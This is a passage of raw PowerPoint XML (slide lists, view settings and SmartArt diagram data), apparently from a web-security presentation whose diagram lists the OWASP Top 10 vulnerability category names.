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tags/tag8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide30.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag10.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7" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId160"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="271" r:id="rId2"/>
    <p:sldId id="261" r:id="rId3"/>
    <p:sldId id="411" r:id="rId4"/>
    <p:sldId id="264" r:id="rId5"/>
    <p:sldId id="306" r:id="rId6"/>
    <p:sldId id="354" r:id="rId7"/>
    <p:sldId id="515" r:id="rId8"/>
    <p:sldId id="508" r:id="rId9"/>
    <p:sldId id="358" r:id="rId10"/>
    <p:sldId id="356" r:id="rId11"/>
    <p:sldId id="519" r:id="rId12"/>
    <p:sldId id="376" r:id="rId13"/>
    <p:sldId id="380" r:id="rId14"/>
    <p:sldId id="256" r:id="rId15"/>
    <p:sldId id="429" r:id="rId16"/>
    <p:sldId id="391" r:id="rId17"/>
    <p:sldId id="395" r:id="rId18"/>
    <p:sldId id="390" r:id="rId19"/>
    <p:sldId id="521" r:id="rId20"/>
    <p:sldId id="533" r:id="rId21"/>
    <p:sldId id="489" r:id="rId22"/>
    <p:sldId id="553" r:id="rId23"/>
    <p:sldId id="410" r:id="rId24"/>
    <p:sldId id="412" r:id="rId25"/>
    <p:sldId id="477" r:id="rId26"/>
    <p:sldId id="413" r:id="rId27"/>
    <p:sldId id="480" r:id="rId28"/>
    <p:sldId id="450" r:id="rId29"/>
    <p:sldId id="483" r:id="rId30"/>
    <p:sldId id="478" r:id="rId31"/>
    <p:sldId id="414" r:id="rId32"/>
    <p:sldId id="415" r:id="rId33"/>
    <p:sldId id="416" r:id="rId34"/>
    <p:sldId id="417" r:id="rId35"/>
    <p:sldId id="418" r:id="rId36"/>
    <p:sldId id="419" r:id="rId37"/>
    <p:sldId id="454" r:id="rId38"/>
    <p:sldId id="453" r:id="rId39"/>
    <p:sldId id="455" r:id="rId40"/>
    <p:sldId id="484" r:id="rId41"/>
    <p:sldId id="422" r:id="rId42"/>
    <p:sldId id="520" r:id="rId43"/>
    <p:sldId id="428" r:id="rId44"/>
    <p:sldId id="427" r:id="rId45"/>
    <p:sldId id="441" r:id="rId46"/>
    <p:sldId id="492" r:id="rId47"/>
    <p:sldId id="493" r:id="rId48"/>
    <p:sldId id="494" r:id="rId49"/>
    <p:sldId id="426" r:id="rId50"/>
    <p:sldId id="443" r:id="rId51"/>
    <p:sldId id="442" r:id="rId52"/>
    <p:sldId id="446" r:id="rId53"/>
    <p:sldId id="445" r:id="rId54"/>
    <p:sldId id="444" r:id="rId55"/>
    <p:sldId id="452" r:id="rId56"/>
    <p:sldId id="449" r:id="rId57"/>
    <p:sldId id="448" r:id="rId58"/>
    <p:sldId id="451" r:id="rId59"/>
    <p:sldId id="502" r:id="rId60"/>
    <p:sldId id="500" r:id="rId61"/>
    <p:sldId id="473" r:id="rId62"/>
    <p:sldId id="516" r:id="rId63"/>
    <p:sldId id="475" r:id="rId64"/>
    <p:sldId id="425" r:id="rId65"/>
    <p:sldId id="432" r:id="rId66"/>
    <p:sldId id="430" r:id="rId67"/>
    <p:sldId id="438" r:id="rId68"/>
    <p:sldId id="431" r:id="rId69"/>
    <p:sldId id="434" r:id="rId70"/>
    <p:sldId id="435" r:id="rId71"/>
    <p:sldId id="436" r:id="rId72"/>
    <p:sldId id="440" r:id="rId73"/>
    <p:sldId id="439" r:id="rId74"/>
    <p:sldId id="433" r:id="rId75"/>
    <p:sldId id="495" r:id="rId76"/>
    <p:sldId id="466" r:id="rId77"/>
    <p:sldId id="472" r:id="rId78"/>
    <p:sldId id="498" r:id="rId79"/>
    <p:sldId id="462" r:id="rId80"/>
    <p:sldId id="496" r:id="rId81"/>
    <p:sldId id="497" r:id="rId82"/>
    <p:sldId id="557" r:id="rId83"/>
    <p:sldId id="464" r:id="rId84"/>
    <p:sldId id="465" r:id="rId85"/>
    <p:sldId id="503" r:id="rId86"/>
    <p:sldId id="486" r:id="rId87"/>
    <p:sldId id="459" r:id="rId88"/>
    <p:sldId id="504" r:id="rId89"/>
    <p:sldId id="505" r:id="rId90"/>
    <p:sldId id="507" r:id="rId91"/>
    <p:sldId id="509" r:id="rId92"/>
    <p:sldId id="522" r:id="rId93"/>
    <p:sldId id="523" r:id="rId94"/>
    <p:sldId id="524" r:id="rId95"/>
    <p:sldId id="525" r:id="rId96"/>
    <p:sldId id="526" r:id="rId97"/>
    <p:sldId id="527" r:id="rId98"/>
    <p:sldId id="531" r:id="rId99"/>
    <p:sldId id="530" r:id="rId100"/>
    <p:sldId id="529" r:id="rId101"/>
    <p:sldId id="528" r:id="rId102"/>
    <p:sldId id="511" r:id="rId103"/>
    <p:sldId id="470" r:id="rId104"/>
    <p:sldId id="510" r:id="rId105"/>
    <p:sldId id="469" r:id="rId106"/>
    <p:sldId id="468" r:id="rId107"/>
    <p:sldId id="467" r:id="rId108"/>
    <p:sldId id="532" r:id="rId109"/>
    <p:sldId id="548" r:id="rId110"/>
    <p:sldId id="549" r:id="rId111"/>
    <p:sldId id="550" r:id="rId112"/>
    <p:sldId id="551" r:id="rId113"/>
    <p:sldId id="552" r:id="rId114"/>
    <p:sldId id="535" r:id="rId115"/>
    <p:sldId id="277" r:id="rId116"/>
    <p:sldId id="278" r:id="rId117"/>
    <p:sldId id="536" r:id="rId118"/>
    <p:sldId id="280" r:id="rId119"/>
    <p:sldId id="393" r:id="rId120"/>
    <p:sldId id="394" r:id="rId121"/>
    <p:sldId id="514" r:id="rId122"/>
    <p:sldId id="554" r:id="rId123"/>
    <p:sldId id="512" r:id="rId124"/>
    <p:sldId id="487" r:id="rId125"/>
    <p:sldId id="542" r:id="rId126"/>
    <p:sldId id="398" r:id="rId127"/>
    <p:sldId id="543" r:id="rId128"/>
    <p:sldId id="399" r:id="rId129"/>
    <p:sldId id="540" r:id="rId130"/>
    <p:sldId id="558" r:id="rId131"/>
    <p:sldId id="559" r:id="rId132"/>
    <p:sldId id="560" r:id="rId133"/>
    <p:sldId id="561" r:id="rId134"/>
    <p:sldId id="562" r:id="rId135"/>
    <p:sldId id="563" r:id="rId136"/>
    <p:sldId id="564" r:id="rId137"/>
    <p:sldId id="537" r:id="rId138"/>
    <p:sldId id="406" r:id="rId139"/>
    <p:sldId id="541" r:id="rId140"/>
    <p:sldId id="488" r:id="rId141"/>
    <p:sldId id="545" r:id="rId142"/>
    <p:sldId id="546" r:id="rId143"/>
    <p:sldId id="547" r:id="rId144"/>
    <p:sldId id="565" r:id="rId145"/>
    <p:sldId id="265" r:id="rId146"/>
    <p:sldId id="407" r:id="rId147"/>
    <p:sldId id="273" r:id="rId148"/>
    <p:sldId id="555" r:id="rId149"/>
    <p:sldId id="544" r:id="rId150"/>
    <p:sldId id="556" r:id="rId151"/>
    <p:sldId id="501" r:id="rId152"/>
    <p:sldId id="397" r:id="rId153"/>
    <p:sldId id="274" r:id="rId154"/>
    <p:sldId id="275" r:id="rId155"/>
    <p:sldId id="276" r:id="rId156"/>
    <p:sldId id="517" r:id="rId157"/>
    <p:sldId id="409" r:id="rId158"/>
    <p:sldId id="518" r:id="rId1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409AE5-B4AD-4E94-BBF8-97ACC8733D5E}">
          <p14:sldIdLst>
            <p14:sldId id="271"/>
            <p14:sldId id="261"/>
            <p14:sldId id="411"/>
            <p14:sldId id="264"/>
            <p14:sldId id="306"/>
            <p14:sldId id="354"/>
            <p14:sldId id="515"/>
            <p14:sldId id="508"/>
            <p14:sldId id="358"/>
            <p14:sldId id="356"/>
            <p14:sldId id="519"/>
            <p14:sldId id="376"/>
            <p14:sldId id="380"/>
            <p14:sldId id="256"/>
            <p14:sldId id="429"/>
            <p14:sldId id="391"/>
            <p14:sldId id="395"/>
            <p14:sldId id="390"/>
            <p14:sldId id="521"/>
            <p14:sldId id="533"/>
            <p14:sldId id="489"/>
            <p14:sldId id="553"/>
            <p14:sldId id="410"/>
            <p14:sldId id="412"/>
            <p14:sldId id="477"/>
            <p14:sldId id="413"/>
            <p14:sldId id="480"/>
            <p14:sldId id="450"/>
            <p14:sldId id="483"/>
            <p14:sldId id="478"/>
            <p14:sldId id="414"/>
            <p14:sldId id="415"/>
            <p14:sldId id="416"/>
            <p14:sldId id="417"/>
            <p14:sldId id="418"/>
            <p14:sldId id="419"/>
            <p14:sldId id="454"/>
            <p14:sldId id="453"/>
            <p14:sldId id="455"/>
            <p14:sldId id="484"/>
            <p14:sldId id="422"/>
            <p14:sldId id="520"/>
            <p14:sldId id="428"/>
            <p14:sldId id="427"/>
            <p14:sldId id="441"/>
            <p14:sldId id="492"/>
            <p14:sldId id="493"/>
            <p14:sldId id="494"/>
            <p14:sldId id="426"/>
            <p14:sldId id="443"/>
            <p14:sldId id="442"/>
            <p14:sldId id="446"/>
            <p14:sldId id="445"/>
            <p14:sldId id="444"/>
            <p14:sldId id="452"/>
            <p14:sldId id="449"/>
            <p14:sldId id="448"/>
            <p14:sldId id="451"/>
            <p14:sldId id="502"/>
            <p14:sldId id="500"/>
            <p14:sldId id="473"/>
            <p14:sldId id="516"/>
            <p14:sldId id="475"/>
            <p14:sldId id="425"/>
            <p14:sldId id="432"/>
            <p14:sldId id="430"/>
            <p14:sldId id="438"/>
            <p14:sldId id="431"/>
            <p14:sldId id="434"/>
            <p14:sldId id="435"/>
            <p14:sldId id="436"/>
            <p14:sldId id="440"/>
            <p14:sldId id="439"/>
            <p14:sldId id="433"/>
            <p14:sldId id="495"/>
            <p14:sldId id="466"/>
            <p14:sldId id="472"/>
            <p14:sldId id="498"/>
            <p14:sldId id="462"/>
            <p14:sldId id="496"/>
            <p14:sldId id="497"/>
            <p14:sldId id="557"/>
            <p14:sldId id="464"/>
            <p14:sldId id="465"/>
            <p14:sldId id="503"/>
            <p14:sldId id="486"/>
            <p14:sldId id="459"/>
            <p14:sldId id="504"/>
            <p14:sldId id="505"/>
            <p14:sldId id="507"/>
            <p14:sldId id="509"/>
            <p14:sldId id="522"/>
            <p14:sldId id="523"/>
            <p14:sldId id="524"/>
            <p14:sldId id="525"/>
            <p14:sldId id="526"/>
            <p14:sldId id="527"/>
            <p14:sldId id="531"/>
            <p14:sldId id="530"/>
            <p14:sldId id="529"/>
            <p14:sldId id="528"/>
            <p14:sldId id="511"/>
            <p14:sldId id="470"/>
            <p14:sldId id="510"/>
            <p14:sldId id="469"/>
            <p14:sldId id="468"/>
            <p14:sldId id="467"/>
            <p14:sldId id="532"/>
            <p14:sldId id="548"/>
            <p14:sldId id="549"/>
            <p14:sldId id="550"/>
            <p14:sldId id="551"/>
            <p14:sldId id="552"/>
            <p14:sldId id="535"/>
            <p14:sldId id="277"/>
            <p14:sldId id="278"/>
            <p14:sldId id="536"/>
            <p14:sldId id="280"/>
            <p14:sldId id="393"/>
            <p14:sldId id="394"/>
            <p14:sldId id="514"/>
            <p14:sldId id="554"/>
            <p14:sldId id="512"/>
            <p14:sldId id="487"/>
            <p14:sldId id="542"/>
            <p14:sldId id="398"/>
            <p14:sldId id="543"/>
            <p14:sldId id="399"/>
            <p14:sldId id="540"/>
            <p14:sldId id="558"/>
            <p14:sldId id="559"/>
            <p14:sldId id="560"/>
            <p14:sldId id="561"/>
            <p14:sldId id="562"/>
            <p14:sldId id="563"/>
            <p14:sldId id="564"/>
            <p14:sldId id="537"/>
            <p14:sldId id="406"/>
            <p14:sldId id="541"/>
            <p14:sldId id="488"/>
            <p14:sldId id="545"/>
            <p14:sldId id="546"/>
            <p14:sldId id="547"/>
            <p14:sldId id="565"/>
            <p14:sldId id="265"/>
            <p14:sldId id="407"/>
            <p14:sldId id="273"/>
            <p14:sldId id="555"/>
            <p14:sldId id="544"/>
            <p14:sldId id="556"/>
            <p14:sldId id="501"/>
            <p14:sldId id="397"/>
            <p14:sldId id="274"/>
            <p14:sldId id="275"/>
            <p14:sldId id="276"/>
            <p14:sldId id="517"/>
            <p14:sldId id="409"/>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2889" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="90" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="57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7281CF-8B67-4D2B-AFDC-72ADEAA7440C}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/default#2" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d6" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful4" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64169CBD-621B-41AC-8098-190EB836285B}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A1: Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2478B4C-85CC-4B56-8035-A1D085B2572C}" type="parTrans" cxnId="{E8FA1B3E-891C-44F5-8B95-213F7D5CE5C0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55DCDCCE-3CAF-428A-ABFC-A8BC8FEF6AA5}" type="sibTrans" cxnId="{E8FA1B3E-891C-44F5-8B95-213F7D5CE5C0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{231AA091-BC50-4CB1-B212-84DF97C37E43}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
            <a:t>A10: Insufficient Logging &amp; Monitoring</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9F48C2C-FB58-44F1-8762-0ACF43D4AFFD}" type="sibTrans" cxnId="{395778C8-53B7-4ABA-B003-A8A213D8106E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFD4E4B3-889C-44E4-98F7-CDE5F5A9E369}" type="parTrans" cxnId="{395778C8-53B7-4ABA-B003-A8A213D8106E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1059736-A6E2-4762-8F49-0456CD8B7C69}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
            <a:t>A5: Broken Access Control</a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C998CC39-D1D3-43DE-8252-4B94A9279E42}" type="sibTrans" cxnId="{63E0B01F-E6B0-4341-846D-AEB7BCF19307}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DBCB215F-2702-4FBF-9B10-EE479A00694C}" type="parTrans" cxnId="{63E0B01F-E6B0-4341-846D-AEB7BCF19307}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FBC627C-7A5D-4F89-A1E1-F66E815CA8A7}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A3: Sensitive Data Exposure</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{678EE478-5D87-49D0-AC29-0A904E85A9CD}" type="sibTrans" cxnId="{62F5A9D3-EBF9-4BEC-9613-FD255126CCE1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C77C0D7A-4688-41D5-A7B6-ECC1745C80BA}" type="parTrans" cxnId="{62F5A9D3-EBF9-4BEC-9613-FD255126CCE1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05B6A14E-A58A-427E-80F5-495E20005676}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A2: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Broken Authentication</a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E232C4F9-D265-42B7-A469-2C93E3FE3984}" type="sibTrans" cxnId="{AE4E6705-38DF-4ECA-80E1-760699C4E255}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F9BC56F-924A-4353-9F8F-40E52BE6F39F}" type="parTrans" cxnId="{AE4E6705-38DF-4ECA-80E1-760699C4E255}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{612007B8-8546-4F29-8566-2D3A5E6A0E13}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A4: XML External Entities (XXE)</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2C66789-85B1-4DEA-99D3-EE1EE6047C79}" type="parTrans" cxnId="{07930510-0312-411D-AF83-BF65AF6FF61A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5275B559-D302-4AB5-AEBD-D60C613E6CD7}" type="sibTrans" cxnId="{07930510-0312-411D-AF83-BF65AF6FF61A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46B9D804-FF29-457F-BCED-346AF8464375}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A7: </a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-GB" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t> Cross-Site Scripting</a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D72ED69-2D18-43DC-B4B3-CC07C84725FA}" type="parTrans" cxnId="{5160490B-30B5-4BC8-8353-C73FDCEAB94D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64941BF5-DD7A-45EE-B676-544B2D4EE4A4}" type="sibTrans" cxnId="{5160490B-30B5-4BC8-8353-C73FDCEAB94D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A8A3DAD-DEA7-4D65-911B-8A3E28473A85}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A6: Security Misconfiguration</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6351F65D-D2EB-47D4-9A72-1293010D2EF2}" type="parTrans" cxnId="{74914C63-D094-4D58-9F0F-EF427C7629D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AEE688A1-9D64-4205-AB1C-FB4631414487}" type="sibTrans" cxnId="{74914C63-D094-4D58-9F0F-EF427C7629D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F977D8BD-EA13-4B0E-B094-A138093AD07F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A8: Insecure Deserialization</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{816F569F-92A3-458D-ADDF-2632F412238B}" type="parTrans" cxnId="{A8C95571-758F-487A-B3FF-9FB85AACC72F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48212937-C659-41D8-94B9-45657A45F3D4}" type="sibTrans" cxnId="{A8C95571-758F-487A-B3FF-9FB85AACC72F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85F6E29B-C4B8-48BE-9B88-FA3493C4C603}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A9: </a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-GB" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>Using Components with Known Vulnerable </a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
